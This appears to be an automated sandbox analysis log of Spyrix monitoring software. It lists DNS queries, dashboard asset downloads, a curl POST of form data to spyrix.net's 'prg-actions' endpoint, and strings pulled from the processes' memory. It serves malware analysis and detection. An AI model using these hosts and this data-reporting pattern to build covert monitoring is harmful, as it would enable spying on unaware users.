Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonTemplate-fd9601a7.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText-ead06ca1.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-1178777c.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ConfirmPhoneModal.module-3f369b32.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Modal-04ffda94.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Input-34212571.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-08b2a987.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-7e7c447a.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button.module-6d4e91b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonTemplate.module-c837805f.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText.module-c769b9ae.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Modal.module-d62c47b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button.vue_vue_type_script_setup_true_lang-56edf5a6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/index-1178777c.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-5393c481.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/en-ef960fb7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ConfirmPhoneModal.module-3f369b32.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/useValidation-954c07e6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/loop-c45f0f1e.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button.module-6d4e91b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonTemplate.module-c837805f.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText.module-c769b9ae.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Modal.module-d62c47b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Button.vue_vue_type_script_setup_true_lang-56edf5a6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Nunito-Bold-765bfff4.woff2 HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/useValidation-954c07e6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/loop-c45f0f1e.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: qrl.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 00000043.00000000.2678705476.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 00000043.00000000.2678705476.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>3[
Source: qrl.exe, 00000045.00000002.2757157897.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 00000045.00000002.2757157897.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>3[
Source: qrl.exe, 00000047.00000002.2746063564.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 00000047.00000002.2746063564.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>3[
Source: qrl.exe, 0000004A.00000002.2767609599.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: qrl.exe, 0000004A.00000002.2767609599.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: Usage: curl [options...] <url>3[

Source: spkl.exe, 00000035.00000003.2616085181.0000000007810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SearchID="http://www.myspace.com/search/" equals www.myspace.com (Myspace)
Source: spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.myspace.com/search/ equals www.myspace.com (Myspace)
Source: spkl.exe, 00000035.00000003.2616085181.0000000007810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: msgID="http://www.myspace.com/my/mail" equals www.myspace.com (Myspace)

Source: global traffic	DNS traffic detected: DNS query: filedn.com
Source: global traffic	DNS traffic detected: DNS query: cdnbaynet.com
Source: global traffic	DNS traffic detected: DNS query: swtb-download.spyrix-sfk.com
Source: global traffic	DNS traffic detected: DNS query: dashboard.spyrix.com
Source: global traffic	DNS traffic detected: DNS query: cdn.cdndownload.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: spyrix.net

Source: unknown

HTTP traffic detected: POST /dashboard/prg-actions HTTP/1.1Host: spyrix.netUser-Agent: curl/7.64.0Accept: */*Content-Length: 425Content-Type: application/x-www-form-urlencoded

Source: spkl.exe, 00000035.00000002.2980946676.0000000006BBA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: HTTPS://DASHBOARD.SPYRIX.COM/
Source: spkl.exe, 00000035.00000002.2971872040.000000000456C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: HTTPS://SPYRIX.NET/DASHBOARD/PRG-ACTIONS
Source: qrl.exe, 00000043.00000000.2678705476.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000045.00000002.2757157897.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000047.00000002.2746063564.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://.css
Source: qrl.exe, qrl.exe, 00000043.00000000.2678705476.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000045.00000002.2757157897.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000047.00000002.2746063564.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://.jpg
Source: [space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.certum.pl/ca.crl0:
Source: [space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.certum.pl/l3.crl0a
Source: [space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: [space]= .tmp, 00000013.00000003.2564952480.00000000033C8000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000013.00000003.2052440387.00000000032E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0
Source: curl.exe, 0000000D.00000003.2045914501.0000000002EED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: svchost.exe, 00000007.00000002.2932001410.000002BE17600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000007.00000003.1705313181.000002BE17448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000007.00000003.1705313181.000002BE17448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 00000007.00000003.1705313181.000002BE17448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 00000007.00000003.1705313181.000002BE17448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000007.00000003.1705313181.000002BE17448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000007.00000003.1705313181.000002BE17448000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000007.00000003.1705313181.000002BE1747D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000007.00000003.1705313181.000002BE17537000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: [space]= .exe, 00000006.00000002.1984705669.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filedn.com
Source: [space]= .exe, 00000006.00000002.1984705669.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filedn.comd
Source: qrl.exe, qrl.exe, 00000043.00000000.2678705476.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000045.00000002.2757157897.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000047.00000002.2746063564.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: qrl.exe, 00000043.00000000.2678705476.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000045.00000002.2757157897.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000047.00000002.2746063564.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004A.00000002.2767609599.0000000000FA2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: http://https://-.://%s%s%s/%s
Source: spkl.exe, 00000035.00000003.2555270269.00000000044E1000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2933829318.0000000000929000.00000040.00000001.01000000.00000014.sdmp, spmm.exe, 00000049.00000000.2715567872.00000000005EA000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://neftali.clubdelphi.com/
